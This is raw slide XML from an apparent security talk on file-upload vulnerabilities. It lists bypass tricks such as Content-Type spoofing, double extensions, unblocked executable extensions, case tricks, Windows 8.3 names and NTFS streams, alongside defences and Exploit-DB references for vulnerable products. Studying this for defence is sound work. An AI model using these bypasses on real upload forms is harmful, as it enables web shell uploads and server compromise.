            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“Transfer-Encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>chunked” and obfuscating the body</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Different File Systems/Operating Systems features. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.g.:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“test.aspx” = “test~1.asp” in Windows which supports 8.3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Different web technologies features. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.g.:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PHP converts “.” to “_” in the parameter name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ASP converts certain UTF-8 characters to ASCII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34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presentation\iStock_000006514445XSmall-300x2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754186"/>
            <a:ext cx="28575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Bypassing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4800" dirty="0"/>
              <a:t>Web Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>Configs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4800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r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>web.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, and so on:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Overwrite their contents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Create a new one in a new folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use Windows 8.3 file names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Other webserver configurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use extensions that are not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>being blocked</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>asa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, php3, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>php4, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ashx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>phtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, …</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Try path traversal to move the uploaded file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2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Topic: Security of File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Uploaders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Form-based File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Upload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>File Upload Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Protections and Bypass Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bonus zero days in examples!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18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Bypassing FS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Permissions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don’t need bypass for file upload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Write access in Upload directory is needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Webserver needs to be configured not FS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not having execute permission does not help!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Write permission can be prohibited outside</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What about Temp/Real Time files/folders?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Still bad if you can upload arbitrary files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It is good to have this to reduce the risk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0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presentation\sophos-log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861048"/>
            <a:ext cx="10668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Bypassing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4800" dirty="0"/>
              <a:t>Antivirus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Application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 only blocks malwares/viruses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web-shell can be obfuscated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>AV vulnerabilities can be exploited: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.g.: Sophos Vulnerabilities </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Tavis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Ormandy: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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Nov 2012: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://secunia.com/advisories/51156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Just upload a file to execute your code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In PHP, you just need to send your file to any PHP file!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15625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Storing Data on Another Domain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solution, hard implementation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>File Server must be isolated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>File Server must be hardened</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Subdomain can still be dangerous</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reading/Setting cross subdomain cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.g.: “domain=.example.com”</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Phishing attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="fish4jump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14922" y="6094809"/>
            <a:ext cx="15049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0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dirty="0" smtClean="0"/>
              <a:t>Content-Type Protection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 in the request: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File extension will change the “Content-Type”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can be easily manipulated by a web-proxy</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mostly image </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>uploaders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> are the victims</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Do Not Trust/Use Content-type!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”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6361113" cy="866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5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 Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" dirty="0" smtClean="0"/>
              <a:t>Content-Type Bypass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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ManageEngine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> Support </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Center</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Plus:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit-DB ID: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>22040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bypass = “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Content-Type: image/gif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>MobileCartly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>1.0:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit-DB ID: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>20539</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bypass = “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Content-Type: image/gif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”…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625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Name and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Extension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First Step: What is File Extension in “test.php.jpg”?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“.php.jpg”?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“.jpg”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Next Step: Which part has validation?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Filename or Extension or Both?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What does it do with existing files?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Logical flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Denial of Service 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5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 Missed Extensions – Got u!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White-list or Black-list?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Check executable extensions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” is blocked, what about “.php3”, “.php4”, “.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>phtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“.asp” is blocked, what about “.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>asa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” or “.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What about client side extensions?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>htm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, .html, .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>swf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, .jar, …?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25329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2- Double Extensions – Featur3s!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most common bypass method in 2012!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Webserver related (can be fixed in Apache)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Apache common configuration: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file.php.jpg” served as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PHP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AddHandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>application/x-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php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Better solution: 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IIS 6 useless feature:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“file.asp;.jpg” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> run as an ASP file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“/folder.asp/file.txt”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>  run as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>ASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>file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4864088" cy="79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355" y="5050680"/>
            <a:ext cx="1320117" cy="15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3- Case </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ensitive Rules? – Easy on3!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Normally when we have Regular Expressions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Always try it!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Code Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Blacklist </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>RegEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: “^\.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>$”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>file.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” != “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>file.PhP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“file.php3.jpg” != “file.PHP3.JpG”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eFront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Exploit-DB ID: 18036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9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 Windows 8.3 – I &lt;3 Featur3s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>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Overwriting sensitive files is easy:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>web.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>” == “WEB~1.con”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>“default.aspx” == “DEFAUL~1.asp”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Files without extensions are allowed?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>“.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>” == “HTACCE~1”</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="32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29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Reported File Upload Vulnerabilities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315616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sz="2400" dirty="0" smtClean="0"/>
              <a:t>Based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>on: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osvdb.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Keyword: File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Upload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>More </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a: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goo.gl/NmxpM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> 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E:\Downloads\chart_1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15" y="1556792"/>
            <a:ext cx="6288570" cy="38884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7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5- Windows File System – Oh, OK!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End of filename - ignored characters:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Trailing dot and space characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“test.asp … . .. .” == “test.asp”</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sometimes when it saves a file:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>test.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;&gt;” == “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>test.php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NTFS Alternate Data Streams:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“file.asp::$data” == “file.asp”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“/folder:$i30:$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Index_allocation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” == “/folder”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“.</a:t>
            </a:r>
            <a:r>
